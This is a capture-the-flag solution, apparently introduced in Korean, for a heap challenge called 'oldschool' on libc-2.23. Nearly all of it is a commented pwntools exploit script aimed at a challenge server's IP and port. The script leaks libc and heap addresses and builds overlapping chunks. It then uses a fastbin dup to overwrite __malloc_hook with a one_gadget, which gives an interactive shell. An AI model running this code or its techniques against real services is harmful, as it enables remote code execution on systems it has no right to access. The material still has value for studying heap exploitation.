의 heap 문제(`oldschool`, libc-2.23)입니다. 아래는 익스플로잇 스크립트입니다.
from pwn import *
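# Target selection.  Runs against the local binary by default; passing REMOTE
# on the command line (pwntools `args`, from `from pwn import *`) switches to the
# challenge server.  DEBUG on the command line makes pwntools hexdump all
# traffic, so no log_level edits are needed here.
if args.REMOTE:
    p = remote("54.157.217.45", 19669)
else:
    p = process('./oldschool')
e = ELF("./oldschool")
# Every libc-relative constant below (the leak arithmetic, __malloc_hook-0x23,
# the one_gadget at 0xf02a4) is tied to this exact libc-2.23 build.  If the
# local process runs with a different system libc, use `l = e.libc` instead
# and recompute those constants.
l = ELF("./libc-2.23.so")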
def add(size, data):
    """Menu option 1: allocate a note of `size` bytes holding `data`.

    Every step waits for the next ": " prompt before answering.  The menu
    choice is sent with a trailing newline while size and data go out with a
    bare send() — presumably matching the binary's read lengths (not
    verifiable from this script).  The fixed 0.3s pause after each write
    keeps consecutive inputs from being merged into one read.  `data` is
    passed through str(), so callers hand in str payloads (p64() output
    under Python-2 pwntools), not py3 bytes.
    """
    steps = (
        (p.sendline, '1'),
        (p.send, str(size)),
        (p.send, str(data)),
    )
    for transmit, payload in steps:
        p.recvuntil(": ")
        transmit(payload)
        sleep(0.3)
def edit(idx, data):
    """Menu option 2: overwrite the contents of note `idx` with `data`.

    Waits for a ": " prompt before each answer.  Choice and index are sent
    with a newline, the payload with a bare send() (presumably the binary
    reads a fixed length there).  A 0.3s pause follows each write so the
    three inputs are not coalesced into a single read.  Note that the script
    later calls this on slots whose chunk has already been freed — the
    binary evidently does not invalidate the slot on free.
    """
    choice = '2'
    prompt = ": "
    pause = 0.3

    p.recvuntil(prompt)
    p.sendline(choice)
    sleep(pause)

    p.recvuntil(prompt)
    p.sendline(str(idx))
    sleep(pause)

    p.recvuntil(prompt)
    p.send(str(data))
    sleep(pause)
def show(idx):
    """Menu option 3: print note `idx`.

    Only drives the menu; the caller is responsible for reading the leaked
    bytes off the socket afterwards (see the `recvuntil` calls that follow
    each use).  Same prompt/pause discipline as the other helpers.
    """
    prompt = ": "
    pause = 0.3
    for answer in ('3', str(idx)):
        p.recvuntil(prompt)
        p.sendline(answer)
        sleep(pause)
def fr(idx):
    """Menu option 4: free note `idx`.

    Drives the two prompts (choice, index) with a 0.3s pause after each.
    Whether the binary clears the slot pointer on free is not visible here;
    the exploit below relies on it not doing so.
    """
    prompt = ": "
    pause = 0.3
    for answer in ('4', str(idx)):
        p.recvuntil(prompt)
        p.sendline(answer)
        sleep(pause)
# --- Stage 1: libc leak through the unsorted bin ---------------------------
# Two consecutive fake chunk headers with size field 0x21 (0x20 | PREV_INUSE).
# They live inside note 0 so a later stage can point a fastbin fd at them and
# pass glibc's size sanity check on the 0x20 bin.
fake = p64(0) + p64(0x21)
fake += p64(0)*3 + p64(0x21)
add(0x60, fake) # 0  (0x70 chunk)
add(0x200, 'a') # 1  (0x210 chunk: too large for a fastbin, so free() unsorts it)
add(0x10, 'a') # 2
add(0x10, 'a') # 3   notes 2/3 sit between note 1 and top, so it cannot merge into top
fr(1)           # note 1 -> unsorted bin; its fd/bk now point into main_arena
add(0x200, 'b') # 1  the same chunk comes back; the lone 'b' overwrites only the
                #    low byte of the stale fd, the rest of the pointer survives
show(1)
# Take the 6 significant bytes of the pointer, which end in 0x7f.  Its low byte
# is now 'b' (0x62) rather than the real value.
# NOTE(review): the constants fit together as follows — on this libc-2.23 build
# &main_arena appears to be __malloc_hook + 0x10 (hence the -0x10), and
# 66 == 0x62 - 0x20 undoes the 'b' byte against main_arena's low byte.  Verify
# under gdb; both numbers are specific to ./libc-2.23.so.
libc = u64(p.recvuntil("\x7f")[-6:].ljust(8, '\x00')) - 0x10 - l.sym['__malloc_hook'] - 66
log.info(hex(libc))
# --- Stage 2: heap leak through a fastbin fd -------------------------------
fr(2)           # 0x20 fastbin: [2]
fr(3)           # 0x20 fastbin: [3] -> [2]; chunk 3's fd now holds chunk 2's address
add(0x10, 'a') # 2  gets chunk 3 back; the 'a' clobbers only the low byte of that fd
sleep(0.3)
add(0x10, 'b') # 3
show(2)
p.recvuntil('Name: ')
# 6-byte heap pointer whose low byte reads 'a' (0x61).
# NOTE(review): chunk 2 should sit 0x280 past the heap start (0x70 + 0x210 for
# notes 0 and 1), so with its low byte replaced the leak reads heap+0x261;
# subtracting 0x61 and 0x200 lands on the heap base.  This assumes the binary
# hands the slots back in the order the `# N` comments claim — confirm in gdb.
heap = u64(p.recv(6).ljust(8, '\x00')) - 0x61 -0x200
log.info(hex(heap))
# --- Stage 3: build overlapping chunks, then fastbin-dup onto __malloc_hook --
# Rewrite note 0's fake 0x20 chunk so its fd field points at the heap base.
fake = p64(0) + p64(0x21)
fake += p64(heap) + p64(0)*2 + p64(0x21)
edit(0, fake)
#context.log_level = 'debug'
# malloc(0) still yields a minimum 0x20 chunk, so these all go through the same
# fastbin as notes 2/3 and the fake chunk above.
# NOTE(review): which slot each allocation lands in, and what edit()/fr() do to
# a slot that has already been freed, depends on the binary's bookkeeping and
# cannot be reconstructed from this script alone.  Trace it under gdb before
# changing any step; the order is load-bearing.
add(0, '6') # 4
add(0, "6") # 5
edit(4, '6')
fr(5)
add(0, '6') # 5
add(0, '6')
fr(4)
fr(6)
edit(5, '6')
#context.log_level = 'debug'
add(0x10, p64(heap))
add(0x10, 'a')
# A second copy of the twin fake headers, and a 16-byte record of the form
# {heap+0x30, 0x60, 10} — this looks like a forged note descriptor
# (pointer, size, ...) matching the binary's own slot layout; presumably it
# lets a later edit()/fr() operate on a chunk the program never handed out.
fake = p64(0) + p64(0x21)
fake += p64(0)*3 + p64(0x21)
add(0x60, fake)
add(0x10, p64(heap+0x30)+p32(0x60) +p32(10))
add(0x60, 'a')
fr(9)
edit(0, p64(heap+0x30))
fr(0)
fr(3)
edit(8, p64(heap+0x460))
fr(7)
fr(1)
fr(2)
# Fastbin dup on the 0x70 bin: the allocation below writes into a chunk that is
# currently free, so the p64 lands in its fd.  __malloc_hook - 0x23 is the usual
# spot where a 0x7f byte sits at the size-field position, which satisfies the
# fastbin size check for 0x70 chunks.
add(0x60, p64(libc+l.sym['__malloc_hook']-0x23))
add(0x60, 'a')                  # drain the bin up to the forged fd
add(0x60, 'b')
# Third allocation returns __malloc_hook-0x23+0x10 = __malloc_hook-0x13, so 19
# bytes of padding reach the hook exactly.  0xf02a4 is a one_gadget offset for
# this libc-2.23 build; its register/stack constraints must hold at the next
# malloc() call — if no shell pops, try another gadget from `one_gadget`.
add(0x60, "A"*19+p64(libc+0xf02a4))
# --- Trigger: any malloc() now dispatches through the overwritten hook -----
# Pick menu option 1 (add); presumably the binary calls malloc on that path
# before it needs more input.  The two recv() calls drain whatever the program
# prints before the gadget runs, then hand the shell to the user.
p.recvuntil(": ")
p.send('1')
p.recv()
p.recv()
p.interactive()